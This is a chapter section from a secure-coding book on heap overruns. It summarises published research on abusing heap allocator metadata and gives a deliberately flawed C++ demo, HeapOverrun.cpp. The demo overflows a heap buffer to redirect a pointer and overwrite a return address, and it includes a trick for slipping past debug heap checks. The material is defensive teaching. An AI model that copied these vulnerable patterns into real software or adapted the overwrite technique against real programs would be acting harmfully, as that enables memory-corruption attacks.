Heap Overruns | Writing Secure Code, Second Edition

Heap Overruns

A heap overrun is much the same problem as a stack-based buffer overrun, but it's somewhat trickier to exploit. As in the case of a stack-based buffer overrun, your attacker can write fairly arbitrary information into places in your application that she shouldn't have access to. One of the best articles I've found is w00w00 on Heap Overflows, written by Matt Conover of w00w00 Security Development (WSD). You can find this article at http://www.w00w00.org/files/articles/heaptut.txt. WSD is a hacker organization that makes the problems they find public and typically works with vendors to get the problems fixed. The article demonstrates a number of the attacks they list, but here's a short summary of the reasons heap overflows can be serious:

Many programmers don't think heap overruns are exploitable, leading them to handle allocated buffers with less care than static buffers.
Tools exist to make stack-based buffer overruns more difficult to exploit. StackGuard, developed by Crispin Cowan and others, uses a test value, known as a canary after the miner's practice of taking a canary into a coal mine, to make a static buffer overrun much less trivial to exploit. Visual C++ .NET incorporates a similar approach. Similar tools do not currently exist to protect against heap overruns.
Some operating systems and chip architectures can be configured to have a nonexecutable stack. Once again, this won't help you against a heap overflow because a nonexecutable stack protects against stack-based attacks, not heap-based attacks.

Although Matt's article gives examples based on attacking UNIX systems, don't be fooled into thinking that Microsoft Windows systems are any less vulnerable. Several proven exploitable heap overruns exist in Windows applications. One possible attack against a heap overrun that isn't covered in the w00w00 article is described in the following post to BugTraq by Solar Designer (available at http://www.securityfocus.com/archive/1/71598):

To: BugTraq

Subject: JPEG COM Marker Processing Vulnerability in Netscape Browsers

Date: Tue Jul 25 2000 04:56:42

Author: Solar Designer < solar@false.com >

Message-ID: <200007242356.DAA01274@false.com>

[nonrelevant text omitted]

For the example below, we'll assume Doug Lea's malloc (which is used by most Linux systems, both libc 5 and glibc) and locale for an 8-bit character set (such as most locales that come with glibc, including en_US or ru_RU.KOI8-R).

The following fields are kept for every free chunk on the list: size of the previous chunk (if free), this chunk's size, and pointers to next and previous chunks. Additionally, bit 0 of the chunk size is used to indicate whether the previous chunk is in use (LSB of actual chunk size is always zero due to the structure size and alignment).

By playing with these fields carefully, it is possible to trick calls to free(3) into overwriting arbitrary memory locations with our data.

[nonrelevant text omitted]

Please note that this is by no means limited to Linux/x86. It's just that one platform had to be chosen for the example. So far, this is known to be exploitable on at least one Win32 installation in a very similar way (via ntdll!RtlFreeHeap).

A more recent presentation by Halvar Flake can be found at http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt. Halvar's article also details several other attacks discussed here.

The following application shows how a heap overrun can be exploited:

/*
  HeapOverrun.cpp
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
  Very flawed class to demonstrate a problem
*/

class BadStringBuf
{
public:
    BadStringBuf(void)
    {
        m_buf = NULL;
    }

    ~BadStringBuf(void)
    {
        if(m_buf != NULL)
            free(m_buf);
    }

    void Init(char* buf)
    {
        //Really bad code
        m_buf = buf;
    }

    void SetString(const char* input)
    {
        //This is stupid.
        strcpy(m_buf, input);
    }

    const char* GetString(void)
    {
        return m_buf;
    }

private:
    char* m_buf;
};

//Declare a pointer to the BadStringBuf class to hold our input.
BadStringBuf* g_pInput = NULL;

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

void BadFunc(const char* input1, const char* input2)
{
    //Someone told me that heap overruns weren't exploitable,
    //so we'll allocate our buffer on the heap.

    char* buf = NULL;
    char* buf2;

    buf2 = (char*)malloc(16);
    g_pInput = new BadStringBuf;
    buf = (char*)malloc(16);
    //Bad programmer - no error checking on allocations

    g_pInput->Init(buf2);

    //The worst that can happen is we'll crash, right???
    strcpy(buf, input1);

    g_pInput->SetString(input2);

    printf("input 1 = %s\ninput 2 = %s\n",
           buf, g_pInput->GetString());

    if(buf != NULL)
        free(buf);
}

int main(int argc, char* argv[])
{
    //Simulated argv strings
    char arg1[128];

    //This is the address of the bar function.
    // It looks backwards because Intel processors are little endian.
    char arg2[4] = {0x0f, 0x10, 0x40, 0};
    int offset = 0x40;

    //Using 0xfd is an evil trick to overcome
    //heap corruption checking.
    //The 0xfd value at the end of the buffer checks for corruption.
    //No error checking here; it is just an example of how to
    //construct an overflow string.
    memset(arg1, 0xfd, offset);
    arg1[offset]   = (char)0x94;
    arg1[offset+1] = (char)0xfe;
    arg1[offset+2] = (char)0x12;
    arg1[offset+3] = 0;
    arg1[offset+4] = 0;

    printf("Address of bar is %p\n", bar);
    BadFunc(arg1, arg2);

    if(g_pInput != NULL)
        delete g_pInput;

    return 0;
}

You can also find this program in the companion content in the folder Secureco2\Chapter05. Let's take a look at what's going on in main. First I'm going to give myself a convenient way to set up the strings I want to pass into my vulnerable function. In the real world, the strings would be passed in by the user. Next I'm going to cheat again and print the address I want to jump into, and then I'll pass the strings into the BadFunc function.

You can imagine that BadFunc was written by a programmer who was embarrassed by shipping a stack-based buffer overrun and a misguided friend told him that heap overruns weren't exploitable. Because he's just learning C++, he's also written BadStringBuf, a C++ class to hold his input buffer pointer. Its best feature is its prevention of memory leaks by freeing the buffer in the destructor. Of course, if the BadStringBuf buffer is not initialized with malloc, calling the free function might cause some problems. Several other bugs exist in BadStringBuf, but I'll leave it as an exercise to the reader to determine where those are.

Let's start thinking like a hacker. You've noticed that this application blows up when either the first or second argument becomes too long but that the address of the error (indicated in the error message) shows that the memory corruption occurs up in the heap. You then start the program in a debugger and look for the location of the first input string. What valuable memory could possibly adjoin this buffer? A little investigation reveals that the second argument is written into another dynamically allocated buffer. Where's the pointer to that buffer? Searching memory for the bytes corresponding to the address of the second buffer, you hit pay dirt: the pointer to the second buffer is sitting there just 0x40 bytes past the location where the first buffer starts. Now we can change this pointer to anything we like, and any string we pass as the second argument will get written to any point in the process space of the application!

As in the first example, the goal here is to get the bar function to execute, so let's overwrite the pointer to reference 0x0012fe94, which in this case happens to be the location of the point in the stack where the return address for the BadFunc function is kept. You can follow along in the debugger if you like. This example was created in Visual C++ 6.0, so if you're using a different version or trying to make it work from a release build, the offsets and memory locations could vary. We'll tailor the second string to set the memory at 0x0012fe94 to the location of the bar function (0x0040100f). There's something interesting about this approach: we haven't smashed the stack, so some mechanisms that might guard the stack won't notice that anything has changed. If you step through the application, you'll get the following results:

Address of bar is 0040100F input 1 =²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² 57 input 2 = 64@ Augh! I've been hacked!

Note that you can run this code in debug mode and step through it because the Visual C++ debug mode stack checking does not apply to the heap!

If you think this example is so convoluted that no one would be likely to figure this out on their own, or if you think that the odds of making this work in the real world are slim, think again. As Solar Designer pointed out in his mail, arbitrary code could have been executed even if the two buffers weren't conveniently next to one another, because you can trick the heap management routines.

NOTE
There are at least three ways that I'm aware of to cause the heap management routines to write four bytes anywhere you like, which can then be used to overwrite pointers, the stack, or, basically, anything you like. It's also often possible to cause security bugs by overwriting values within the application. Access checks are one obvious example.

A growing number of heap overrun exploits exist in the wild. It is sometimes harder to exploit a heap overrun than a stack-based buffer overrun, but to a hacker, regardless of whether he is a good or malicious hacker, the more interesting the problem, the cooler it is to have solved it. The bottom line here is that you do not want user input ever being written to arbitrary locations in memory.